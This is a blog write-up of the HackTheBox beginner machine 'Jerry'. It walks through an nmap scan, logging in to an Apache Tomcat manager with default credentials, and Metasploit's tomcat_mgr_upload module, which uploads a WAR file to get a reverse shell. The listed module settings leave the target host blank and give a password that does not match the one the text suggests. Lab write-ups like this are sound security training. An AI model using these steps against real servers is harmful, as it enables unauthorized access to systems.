The Dutch Hacker
Jerry - hackthebox write up

Jerry – HackTheBox write up

Jerry - HackTheBox write up

This is the write up for Jerry. Jerry is part of the Beginners track on HackTheBox. I’m using Metasploit to exploit this machine once I have found the first credentials.

User and Root for Jerry

First we do an scan

nmap -T4 -A -p-
Jerry - HackTheBox write up

I see that TomCat/7.0.88 is running.

Navigating to the site reveals that the default website is still running

tomcat exploit

Click on manager app and tried the default credentials admin:admin

Now I’m getting this page

tomcat default credentials

Ít is suggesting password s3cret. Let’s give that a try on the manager app


Jerry - HackTheBox write up

And we are in.

I know nothing about Tomcat. After one google string “Tomcat web application manager exploit” I came across the following site

Multiple Ways to Exploit Tomcat Manager (

It seems we need a WAR file that we can upload and run to get a reverse shell. I’m going to use the msfconsole for this as stated in the site we found

Start up the msfconsole by typing


after the console is started. Type in the following commands

use exploit/multi/http/tomcat_mgr_upload
set rhost
set rport 8080
set httpusername tomcat
set httppassword tomcat
set LHOST tun0
Jerry - HackTheBox write up

and now we have a shell

Jerry - HackTheBox write up

You can now get the flags at the appropriate locations

Conclusion of Jerry – HackTheBox

This is a very easy box and I need to do this box without msfconsole in the feature. But we see how dangerous it can be if we do not change default credentials. We could not do this exploit without those credentials

There is more on war files here How to Hack Apache Tomcat via Malicious WAR File Upload « Null Byte :: WonderHowTo

And this conclude the write up for Jerry on hackthebox

Most Popular Post

Sign Up

Signup today for free and be the first to get notified on new updates.
* indicates required

Follow Me

Most Popular Post

Contact Us